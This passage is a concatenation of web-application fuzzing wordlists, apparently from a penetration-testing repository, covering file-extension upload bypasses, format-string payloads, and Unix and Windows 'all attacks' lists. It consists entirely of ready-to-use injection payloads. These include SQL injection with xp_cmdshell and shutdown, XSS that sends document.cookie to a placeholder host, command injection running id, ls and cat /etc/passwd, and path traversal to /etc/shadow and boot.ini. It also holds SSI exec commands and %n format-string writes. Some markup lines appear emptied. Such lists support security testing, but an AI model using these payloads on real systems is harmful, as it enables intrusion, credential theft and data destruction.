7 | pHtml 8 | pHp 9 | pHp3 10 | pHp4 11 | pHp5 12 | iNc 13 | iNc%00 14 | iNc%20%20%20 15 | iNc%20%20%20...%20.%20.. 16 | iNc...... 17 | inc%00 18 | inc%20%20%20 19 | inc%20%20%20...%20.%20.. 20 | inc...... 21 | pHp%00 22 | pHp%20%20%20 23 | pHp%20%20%20...%20.%20.. 24 | pHp...... 25 | pHp3%00 26 | pHp3%20%20%20 27 | pHp3%20%20%20...%20.%20.. 28 | pHp3...... 29 | pHp4%00 30 | pHp4%20%20%20 31 | pHp4%20%20%20...%20.%20.. 32 | pHp4...... 33 | pHp5%00 34 | pHp5%20%20%20 35 | pHp5%20%20%20...%20.%20.. 36 | pHp5...... 37 | pHtml%00 38 | pHtml%20%20%20 39 | pHtml%20%20%20...%20.%20.. 40 | pHtml...... 41 | php%00 42 | php%20%20%20 43 | php%20%20%20...%20.%20.. 44 | php...... 45 | php3%00 46 | php3%20%20%20 47 | php3%20%20%20...%20.%20.. 48 | php3...... 49 | php4%00 50 | php4%20%20%20 51 | php4%20%20%20...%20.%20.. 52 | php4...... 53 | php5%00 54 | php5%20%20%20 55 | php5%20%20%20...%20.%20.. 56 | php5...... 57 | phtml%00 58 | phtml%20%20%20 59 | phtml%20%20%20...%20.%20.. 60 | phtml...... 61 | -------------------------------------------------------------------------------- /format-strings.txt: -------------------------------------------------------------------------------- 1 | %s%p%x%d 2 | %p%p%p%p 3 | %x%x%x%x 4 | %d%d%d%d 5 | %s%s%s%s 6 | %99999999999s 7 | %08x 8 | %20d 9 | %20n 10 | %20x 11 | %20s 12 | %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d 13 | %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i 14 | %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o 15 | %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u 16 | %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x 17 | %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X 18 | %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a 19 | %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A 20 | %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e 21 | %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E 22 | %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f 23 | %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F 24 | %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g 25 | %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G 26 | %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s 27 | %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p 28 | %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% 29 | XXXXX.%p 30 | XXXXX`perl -e 'print ".%p" x 80'` 31 | `perl -e 'print ".%p" x 80'`%n 32 | %08x.%08x.%08x.%08x.%08x\n 33 | XXX0_%08x.%08x.%08x.%08x.%08x\n 34 | %.16705u%2\$hn 35 | \x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s| 36 | AAAAA%c 37 | AAAAA%d 38 | AAAAA%e 39 | AAAAA%f 40 | AAAAA%I 41 | AAAAA%o 42 | AAAAA%p 43 | AAAAA%s 44 | AAAAA%x 45 | AAAAA%n 46 | ppppp%c 47 | ppppp%d 48 | ppppp%e 49 | ppppp%f 50 | ppppp%I 51 | ppppp%o 52 | ppppp%p 53 | ppppp%s 54 | ppppp%x 55 | ppppp%n 56 | %@ 57 | %@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@ 58 | %* 59 | %*p 60 | %*x 61 | %*s 62 | %*S 63 | %*$* 64 | %*$*p 65 | %*$*x 66 | %*$*s 67 | %*$*S 68 | -------------------------------------------------------------------------------- /fuzzfull/all-attacks-unix.txt: -------------------------------------------------------------------------------- 1 | ! 2 | !' 3 | !@#$%%^#$%#$@#$%$$@#$%^^**(() 4 | !@#0%^#0##018387@#0^^**(() 5 | " 6 | " or "a"="a 7 | " or "x"="x 8 | " or 0=0 # 9 | " or 0=0 -- 10 | " or 1=1 or ""=" 11 | " or 1=1-- 12 | "' or 1 --'" 13 | ") or ("a"="a 14 | "]>&xxe;" 15 | "]>&xxe;" 16 | "" 17 | "SCRIPT]]>alert('XSS');/SCRIPT]]>" 18 | "XSS" 19 | "cript:alert('XSS')"">" 20 | "]]>" 21 | "> 23 | "> 24 | ">xxx

yyy 25 | "\t" 26 | # 27 | #' 28 | #' 29 | #xA 30 | #xA#xD 31 | #xD 32 | #xD#xA 33 | $NULL 34 | $null 35 | % 36 | %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% 37 | %00 38 | %00../../../../../../etc/passwd 39 | %00../../../../../../etc/shadow 40 | %00/ 41 | %00/etc/passwd%00 42 | %01%02%03%04%0a%0d%0aADSF 43 | %08x 44 | %0A/usr/bin/id 45 | %0A/usr/bin/id%0A 46 | %0Aid 47 | %0Aid%0A 48 | %0a ping -i 30 127.0.0.1 %0a 49 | %oa ping -n 30 127.0.0.1 %0a 50 | %0a id %0a 51 | %0aDATA%0afoo%0a%2e%0aMAIL+FROM:+%0aRCPT+TO:+%0aDATA%0aFrom:+%0aTo:+%0aSubject:+tst%0afoo%0a%2e%0a 52 | %0d 53 | %0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+%0d%0aRCPT+TO:+%0d%0aDATA%0d%0aFrom:+%0d%0aTo:+%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a 54 | %0d%0aX-Injection-Header:%20AttackValue 55 | %20 56 | %20$(sleep%2050) 57 | %20'sleep%2050' 58 | %20d 59 | %20n 60 | %20s 61 | %20x 62 | %20| 63 | %21 64 | %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E 65 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini 66 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 67 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 68 | %2500 69 | %250a 70 | %26 71 | %27%20or%201=1 72 | %28 73 | %29 74 | %2A 75 | %2A%28%7C%28mail%3D%2A%29%29 76 | %2A%28%7C%28objectclass%3D%2A%29%29 77 | %2A%7C 78 | %2C 79 | %2e%2e%2f 80 | %3C 81 | %3C%3F 82 | %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E 83 | %3cscript%3ealert("XSS");%3c/script%3e 84 | %3cscript%3ealert(document.cookie);%3c%2fscript%3e 85 | %5C 86 | %5C/ 87 | %60 88 | %7C 89 | %7f 90 | %99999999999s 91 | %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A 92 | %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E 93 | %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F 94 | %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G 95 | %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X 96 | %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a 97 | %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d 98 | %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e 99 | %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f 100 | %ff 101 | %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g 102 | %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i 103 | %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o 104 | %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p 105 | %s%p%x%d 106 | %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s 107 | %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u 108 | %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x 109 | & 110 | & id 111 | & ping -i 30 127.0.0.1 & 112 | & ping -n 30 127.0.0.1 & 113 | < 114 | < 115 | < 116 | < 117 | < 118 | < 119 | < 120 | < 121 | < 122 | < 123 | 124 | 125 | 126 | 127 | < 128 | < 129 | < 130 | < 131 | < 132 | < 133 | < 134 | < 135 | < 136 | < 137 | < 138 | < 139 | < 140 | < 141 | < 142 | < 143 | < 144 | < 145 | < 146 | < 147 | < 148 | < 149 | < 150 | < 151 | < 152 | < 153 | < 154 | < 155 | < 156 | < 157 | < 158 | < 159 | < 160 | < 161 | < 162 | < 163 | < 164 | < 165 | < 166 | < 167 | < 168 | < 169 | < 170 | < 171 | < 172 | < 173 | < 174 | < 175 | < 176 | < 177 | < 178 | < 179 | ' 180 | '%20OR 181 | &id 182 | < 183 | < 184 | <!--#exec%20cmd="/bin/cat%20/etc/passwd"--> 185 | <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> 186 | <!--#exec%20cmd="/usr/bin/id;--> 187 | <>"'%;)(&+ 188 | <script>alert(document.cookie);<script>alert 189 | <script>alert(document.cookie); 190 | ";id" 191 | ' 192 | ' (select top 1 193 | ' -- 194 | ' ; 195 | ' UNION ALL SELECT 196 | ' UNION SELECT 197 | ' or ''=' 198 | ' or '1'='1 199 | ' or '1'='1'-- 200 | ' or 'x'='x 201 | ' or (EXISTS) 202 | ' or 0=0 # 203 | ' or 0=0 -- 204 | ' or 1 in (@@version)-- 205 | ' or 1=1 or ''=' 206 | ' or 1=1-- 207 | ' or a=a-- 208 | ' or uid like '% 209 | ' or uname like '% 210 | ' or user like '% 211 | ' or userid like '% 212 | ' or username like '% 213 | '%20or%201=1 214 | '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E 215 | '';!--"=&{()} 216 | ') or ('a'='a 217 | '-- 218 | '; exec master..xp_cmdshell 219 | '; exec xp_regread 220 | '; waitfor delay '0:30:0'-- 221 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//>!--=&{} 222 | ';shutdown-- 223 | '> 224 | '> 225 | 'hi' or 'x'='x'; 226 | 'or select * 227 | 'sqlattempt1 228 | '||UTL_HTTP.REQUEST 229 | '||Utl_Http.request('http://') from dual-- 230 | ( 231 | (') 232 | (sqlattempt2) 233 | ) 234 | )))))))))) 235 | * 236 | *' 237 | *' 238 | *(|(mail=*)) 239 | *(|(objectclass=*)) 240 | */* 241 | *| 242 | + 243 | +%00 244 | ,@variable 245 | - 246 | -- 247 | --'; 248 | --sp_password 249 | -1 250 | -1.0 251 | -2 252 | -20 253 | -268435455 254 | ..%%35%63 255 | ..%%35c 256 | ..%25%35%63 257 | ..%255c 258 | ..%5c 259 | ..%bg%qf 260 | ..%c0%af 261 | ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini 262 | ..%u2215 263 | ..%u2216 264 | ../ 265 | ../../../../../../../../../../../../etc/hosts 266 | ../../../../../../../../../../../../etc/hosts%00 267 | ../../../../../../../../../../../../etc/passwd 268 | ../../../../../../../../../../../../etc/passwd%00 269 | ../../../../../../../../../../../../etc/shadow 270 | ../../../../../../../../../../../../etc/shadow%00 271 | ..\ 272 | ..\..\..\..\..\..\..\..\..\..\etc\passwd 273 | ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 274 | ..\..\..\..\..\..\..\..\..\..\etc\shadow 275 | ..\..\..\..\..\..\..\..\..\..\etc\shadow%00 276 | .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 277 | .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow 278 | / 279 | /%00/ 280 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 281 | /%2A 282 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 283 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow 284 | /' 285 | /' 286 | /,%ENV,/ 287 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd 288 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow 289 | /.../.../.../.../.../ 290 | /../../../../../../../../%2A 291 | /../../../../../../../../../../../etc/passwd%00.html 292 | /../../../../../../../../../../../etc/passwd%00.jpg 293 | /../../../../../../../../../../etc/passwd 294 | /../../../../../../../../../../etc/passwd^^ 295 | /../../../../../../../../../../etc/shadow 296 | /../../../../../../../../../../etc/shadow^^ 297 | /../../../../../../../../bin/id| 298 | /..\../..\../..\../..\../..\../..\../boot.ini 299 | /..\../..\../..\../..\../..\../..\../etc/passwd 300 | /..\../..\../..\../..\../..\../..\../etc/shadow 301 | /./././././././././././etc/passwd 302 | /./././././././././././etc/shadow 303 | // 304 | //* 305 | /etc/passwd 306 | /etc/shadow 307 | /index.html|id| 308 | 0 309 | 0 or 1=1 310 | 00 311 | 0xfffffff 312 | 1 313 | 1 or 1 in (@@version)-- 314 | 1 or 1=1-- 315 | 1.0 316 | 1; waitfor delay '0:30:0'-- 317 | 1;SELECT%20* 318 | 1||Utl_Http.request('http://') from dual-- 319 | 2 320 | 2147483647 321 | 268435455 322 | 65536 323 | :response.write 111111 324 | ; 325 | ; ping 127.0.0.1 ; 326 | ;/usr/bin/id\n 327 | ;echo 111111 328 | ;id 329 | ;id; 330 | ;id\n 331 | ;id| 332 | ';id 333 | ';id;' 334 | ";id;" 335 | '`id`' 336 | "`id`" 337 | ;ls -la 338 | ;system('/usr/bin/id') 339 | ;system('cat%20/etc/passwd') 340 | ;system('id') 341 | ;|/usr/bin/id| 342 | < 343 | < script > < / script> 344 | SCRIPT]]>alert('XSS');/SCRIPT]]> 346 | var n=0;while(true){n++;}]]> 347 | 348 | << 349 | <<< 350 | < 351 | <>"'%;)(&+ 352 | ]>&xxe; 354 | ]>&xxe; 355 | ]>&xxe; 356 | ]>&xxe; 357 | 358 | SCRIPT]]>alert('XSS');/SCRIPT]]> 359 | XSS 360 | "> 361 | 362 | 363 | 364 | 365 | 366 | 367 | 368 | 370 | 371 | 372 | 373 | 374 | 375 | 376 | 377 | 378 | 379 | 380 | 381 | 382 | ','')); phpinfo(); exit;/* 383 | 384 | 385 | <IMG SRC="javascript:alert('XSS')"> 386 | ]]> 387 | 388 | 389 | %0aBcc: 390 | %0aCc: 391 | %0d%0aBcc: 392 | %0d%0aCc: 393 | = 394 | =' 395 | =-- 396 | =; 397 | > 398 | ?x= 399 | ?x=" 400 | ?x=> 401 | ?x=| 402 | @' 403 | @' 404 | @* 405 | @variable 406 | A 407 | ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x| 408 | FALSE 409 | NULL 410 | PRINT 411 | PRINT @@variable 412 | TRUE 413 | XXXXX.%p 414 | XXXXX`perl -e 'print ".%p" x 80'` 415 | ['] 416 | ['] 417 | \ 418 | \";alert('XSS');// 419 | \"blah 420 | \' 421 | \' 422 | \..\..\..\..\..\..\..\..\..\..\etc\passwd 423 | \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 424 | \..\..\..\..\..\..\..\..\..\..\etc\shadow 425 | \..\..\..\..\..\..\..\..\..\..\etc\shadow%00 426 | \0 427 | \00 428 | \00\00 429 | \00\00\00 430 | \0\0 431 | \0\0\0 432 | \\ 433 | \\'/bin/cat%20/etc/passwd\\' 434 | \\'/bin/cat%20/etc/shadow\\' 435 | \\/ 436 | \\\\* 437 | \\\\?\\ 438 | \n/bin/ls -al\n 439 | \n/usr/bin/id; 440 | \n/usr/bin/id\n 441 | \n/usr/bin/id| 442 | \nid; 443 | \nid\n 444 | \nid| 445 | \nnetstat -a%\n 446 | \t 447 | \u003C 448 | \u003c 449 | \x23 450 | \x27 451 | \x27UNION SELECT 452 | \x27\x4F\x52 SELECT * 453 | \x27\x6F\x72 SELECT * 454 | \x3C 455 | \x3D \x27 456 | \x3D \x3B' 457 | \x3c 458 | ^' 459 | ^' 460 | ` 461 | `/usr/bin/id` 462 | `dir` 463 | `id` 464 | `perl -e 'print ".%p" x 80'`%n 465 | `ping 127.0.0.1` 466 | a);/usr/bin/id 467 | a);/usr/bin/id; 468 | a);/usr/bin/id| 469 | a);id 470 | a);id; 471 | a);id| 472 | a)|/usr/bin/id 473 | a)|/usr/bin/id; 474 | a)|id 475 | a)|id; 476 | a;/usr/bin/id 477 | a;/usr/bin/id; 478 | a;/usr/bin/id| 479 | a;id 480 | a;id; 481 | a;id| 482 | http:/// 483 | id%00 484 | id%00| 485 | insert 486 | like 487 | limit 488 | null 489 | or 490 | or 0=0 # 491 | or 0=0 -- 492 | or 1=1-- 493 | or%201=1 494 | or%201=1 -- 495 | response.write 111111 496 | something%00html 497 | update 498 | x' or 1=1 or 'x'='y 499 | x' or name()='username' or 'x'='y 500 | xsstest 501 | xsstest%00"<>' 502 | {'} 503 | |/usr/bin/id 504 | |/usr/bin/id| 505 | |id 506 | |id; 507 | |id| 508 | |ls 509 | |ls -la 510 | |nid\n 511 | |usr/bin/id\n 512 | || 513 | || ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 & 514 | ||/usr/bin/id; 515 | ||/usr/bin/id| 516 | } 517 | -------------------------------------------------------------------------------- /fuzzfull/all-attacks-win.txt: -------------------------------------------------------------------------------- 1 | # a wide sample of malicious input for windows targets 2 | A 3 | TRUE 4 | FALSE 5 | 0 6 | 00 7 | 1 8 | -1 9 | 1.0 10 | -1.0 11 | 2 12 | -2 13 | -20 14 | 65536 15 | 268435455 16 | -268435455 17 | 2147483647 18 | 0xfffffff 19 | NULL 20 | null 21 | \0 22 | \00 23 | < script > < / script> 24 | %0a 25 | %00 26 | +%00 27 | \0 28 | \0\0 29 | \0\0\0 30 | \00 31 | \00\00 32 | \00\00\00 33 | $null 34 | $NULL 35 | `dir` 36 | \nnetstat -a%\n 37 | \"blah 38 | |dir| 39 | ";id" 40 | dir%00 41 | dir%00| 42 | |dir 43 | |dir| 44 | |/bin/ls -al 45 | ?x= 46 | ?x=" 47 | ?x=| 48 | ?x=> 49 | /boot.ini 50 | ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x| 51 | ../../boot.ini 52 | /../../../../../../../../%2A 53 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 54 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini 55 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini 56 | ../../../../../../../../conf/server.xml 57 | C:/inetpub/wwwroot/global.asa 58 | C:\inetpub\wwwroot\global.asa 59 | C:/boot.ini 60 | C:\boot.ini 61 | ../../../../../../../../../../../../localstart.asp%00 62 | ../../../../../../../../../../../../localstart.asp 63 | ../../../../../../../../../../../../boot.ini%00 64 | ../../../../../../../../../../../../boot.ini 65 | /./././././././././././boot.ini 66 | /../../../../../../../../../../../boot.ini%00 67 | /../../../../../../../../../../../boot.ini 68 | /..\../..\../..\../..\../..\../..\../boot.ini 69 | /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini 70 | \..\..\..\..\..\..\..\..\..\..\boot.ini 71 | ..\..\..\..\..\..\..\..\..\..\boot.ini%00 72 | ..\..\..\..\..\..\..\..\..\..\boot.ini 73 | /../../../../../../../../../../../boot.ini%00.html 74 | /../../../../../../../../../../../boot.ini%00.jpg 75 | /.../.../.../.../.../ 76 | ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini 77 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini 78 | %0d%0aX-Injection-Header:%20AttackValue 79 | !@#0%^#0##018387@#0^^**(() 80 | %01%02%03%04%0a%0d%0aADSF 81 | /,%ENV,/ 82 | <!--#exec%20cmd="dir"--> 83 | <!--#exec%20cmd="dir"--> 84 | % 85 | # 86 | * 87 | } 88 | ; 89 | / 90 | \ 91 | \\ 92 | \\/ 93 | \\\\* 94 | \\\\?\\ 95 | < 96 | < 97 | < 98 | < 99 | < 100 | << 101 | <<< 102 | | 103 | || 104 | ` 105 | - 106 | -- 107 | *| 108 | ^' 109 | \' 110 | /' 111 | @' 112 | (') 113 | {'} 114 | ['] 115 | *' 116 | #' 117 | !' 118 | !@#$%%^#$%#$@#$%$$@#$%^^**(() 119 | %01%02%03%04%0a%0d%0aADSF 120 | \t 121 | "\t" 122 | 123 | 124 | 125 | 126 | #xD 127 | #xA 128 | #xD#xA 129 | #xA#xD 130 | /%00/ 131 | %00/ 132 | %00 133 | xxx

yyy 235 | "> 237 | < 238 | 239 | '> 240 | '> 241 | \";alert('XSS');// 242 | %3cscript%3ealert("XSS");%3c/script%3e 243 | %3cscript%3ealert(document.cookie);%3c%2fscript%3e 244 | %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E 245 | <script>alert(document.cookie); 246 | <script>alert(document.cookie);<script>alert 247 | 248 | 249 | 250 | 252 | 253 | 254 | 255 | "> 256 | 257 | 258 | 259 | 260 | 261 | 262 | 263 | 264 | 265 | 266 | 267 | 268 | 269 | '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E 270 | "> 271 | %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E 272 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//>!--=&{} 273 | '';!--"=&{()} 274 | 275 | ' 276 | " 277 | # 278 | - 279 | -- 280 | ' -- 281 | --'; 282 | ' ; 283 | = ' 284 | = ; 285 | = -- 286 | \x23 287 | \x27 288 | \x3D \x3B' 289 | \x3D \x27 290 | \x27\x4F\x52 SELECT * 291 | \x27\x6F\x72 SELECT * 292 | 'or select * 293 | admin'-- 294 | ';shutdown-- 295 | <>"'%;)(&+ 296 | ' or ''=' 297 | ' or 'x'='x 298 | " or "x"="x 299 | ') or ('x'='x 300 | 0 or 1=1 301 | ' or 0=0 -- 302 | " or 0=0 -- 303 | or 0=0 -- 304 | ' or 0=0 # 305 | " or 0=0 # 306 | or 0=0 # 307 | ' or 1=1-- 308 | " or 1=1-- 309 | ' or '1'='1'-- 310 | "' or 1 --'" 311 | or 1=1-- 312 | or%201=1 313 | or%201=1 -- 314 | ' or 1=1 or ''=' 315 | " or 1=1 or ""=" 316 | ' or a=a-- 317 | " or "a"="a 318 | ') or ('a'='a 319 | ") or ("a"="a 320 | hi" or "a"="a 321 | hi" or 1=1 -- 322 | hi' or 1=1 -- 323 | hi' or 'a'='a 324 | hi') or ('a'='a 325 | hi") or ("a"="a 326 | 'hi' or 'x'='x'; 327 | @variable 328 | ,@variable 329 | PRINT 330 | PRINT @@variable 331 | select 332 | insert 333 | as 334 | or 335 | procedure 336 | limit 337 | order by 338 | asc 339 | desc 340 | delete 341 | update 342 | distinct 343 | having 344 | truncate 345 | replace 346 | like 347 | handler 348 | bfilename 349 | ' or username like '% 350 | ' or uname like '% 351 | ' or userid like '% 352 | ' or uid like '% 353 | ' or user like '% 354 | exec xp 355 | exec sp 356 | '; exec master..xp_cmdshell 357 | '; exec xp_regread 358 | t'exec master..xp_cmdshell 'nslookup www.google.com'-- 359 | --sp_password 360 | \x27UNION SELECT 361 | ' UNION SELECT 362 | ' UNION ALL SELECT 363 